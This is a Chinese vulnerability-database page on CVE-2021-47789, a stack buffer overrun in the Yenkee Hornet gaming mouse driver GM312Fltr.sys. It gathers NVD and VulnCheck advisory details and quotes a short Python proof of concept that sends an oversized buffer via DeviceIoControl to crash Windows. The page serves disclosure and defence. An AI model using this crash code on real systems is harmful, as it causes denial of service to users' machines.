支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2021-47789 基础信息
漏洞信息
                                        # Yenkee Hornet 鼠标驱动拒绝服务漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Yenkee Hornet Gaming Mouse driver GM312Fltr.sys contains a buffer overrun vulnerability that allows attackers to crash the system by sending oversized input. Attackers can exploit the driver by sending a 2000-byte buffer through DeviceIoControl to trigger a kernel-level system crash.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
栈缓冲区溢出
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2021-47789 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2021-47789 的情报信息
  • 标题: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) - Windows dos Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 关键信息摘要
    
    #### 漏洞概述
    - **EDB-ID**: 50311
    - **CVE**: N/A
    - **标题**: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
    - **类型**: DOS (拒绝服务)
    - **平台**: Windows
    - **日期**: 2021-09-21
    - **作者**: QUADR0N RESEARCH LAB
    - **测试环境**: Windows 10 x64 ENGLISH Professional
    
    #### 漏洞细节
    - **漏洞模块**: GM312Fltr.sys
    - **错误代码**: 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER)
    - **描述**: 驱动程序越界访问了栈上的缓冲区,可能导致恶意用户控制机器。
    
    #### 漏洞代码示例
    ```python
    import ctypes
    from ctypes import *
    from itertools import product
    
    # 漏洞利用代码示例
    kernel32 = windll.kernel32
    hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
    
    if not hevDevice or hevDevice == -1:
        print("Not Win! Sorry!")
    else:
        print("OPENED!")
    
        buf = 'A' * 2000
        bufLength = 2000
    
        kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
    ```
    
    #### 调试信息
    - **Bugcheck Analysis**: 
      - **Fatal System Error**: 0x000000f7
      - **详细描述**: 驱动程序越界访问了栈上的缓冲区,可能允许恶意用户获取机器的控制权。
      - **Call Site**: 多个函数调用栈,具体涉及`nt!DbgBreakPointWithStatus`, `GM312Fltr+0xea7`等。
                                            
    Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) - Windows dos Exploit
  • 标题: Quality accessories | Yenkee | Yenkee -- 🔗来源链接

    标签:product

    神龙速读:
                                            由于您提供的图片中只包含一个黄色的几何图案,没有文字、链接或其他可读信息,因此无法从这个图片提取关于漏洞的关键信息。通常,关于漏洞的信息应包含漏洞的描述、ID、影响范围、利用方式、修复建议等具体内容。如果您能提供包含具体信息的截图,我可以帮助您提取和总结关键信息。
    
    如果您有关于这张图片的其他问题或需要进一步的帮助,请告诉我!
                                            
    Quality accessories | Yenkee | Yenkee
  • 标题: Kernel_Driver_bugs/GM312Fltr at main · Quadron-Research-Lab/Kernel_Driver_bugs · GitHub -- 🔗来源链接

    标签:technical-descriptionexploit

    神龙速读:
                                            ### 关键漏洞信息
    
    - **Repository**: `Quadron-Research-Lab / Kernel_Driver_bugs`
    - **Commit Message**: "Delete a"
    - **Commit Time**: 5 years ago
    - **Files in Folder**: `GM312Filtr`
    
      - `GM312Filtr.sys` (Driver File)
      - `GM312Filtr_PoC.py` (Proof of Concept Script)
      - `Gm312Filtr_bugcheck_analysis.txt` (Bug Check Analysis File)
    
    - **Other Vulnerable Drivers**: Also contains directories for other drivers like `Hyper-V_VMSwitch.sys`, `Logitech_Gaming`, etc.
                                            
    Kernel_Driver_bugs/GM312Fltr at main · Quadron-Research-Lab/Kernel_Driver_bugs · GitHub
  • 标题: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ### 漏洞关键信息
    
    #### Severity
    - Medium
    
    #### Date
    - January 15, 2026
    
    #### Affecting
    - Yenkee Hornet Gaming Mouse all versions
    
    #### Vulnerability
    - CVE-2021-47789
    - CWE-121 Stack-based Buffer Overflow
    
    #### References
    - [ExploitDB-50311](link)
    - [Yenkee Vendor Webpage](link)
    - [Quadron Research Lab Kernel Driver Bugs Repository](link)
    
    #### Credit
    - Quadron Research Lab
    
    #### Description
    - Yenkee Hornet Gaming Mouse driver GM312Fltr.sys contains a buffer overrun vulnerability that allows attackers to crash the system by sending oversized input. Attackers can exploit the driver by sending a 2000-byte buffer through DeviceIoControl to trigger a kernel-level system crash.
                                            
    Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2021-47789
四、漏洞 CVE-2021-47789 的评论

暂无评论


发表评论